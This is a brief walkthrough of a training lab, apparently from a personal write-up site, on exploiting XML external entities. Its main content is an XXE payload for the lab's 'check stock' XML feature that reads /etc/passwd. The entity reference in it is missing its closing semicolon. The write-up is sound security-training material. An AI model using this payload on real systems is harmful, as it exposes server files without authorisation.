Exploiting XXE using external entities to retrieve files

Exploitation

the lab has a "check stock" feature that parses XML input

send this request to repeater

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<stockCheck><productId>&example</productId><storeId>1</storeId></stockCheck>

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousXXE - XML EXTERNAL ENTITIES NextExploiting XXE to perform SSRF attacks

Last updated 2 years ago

Was this helpful?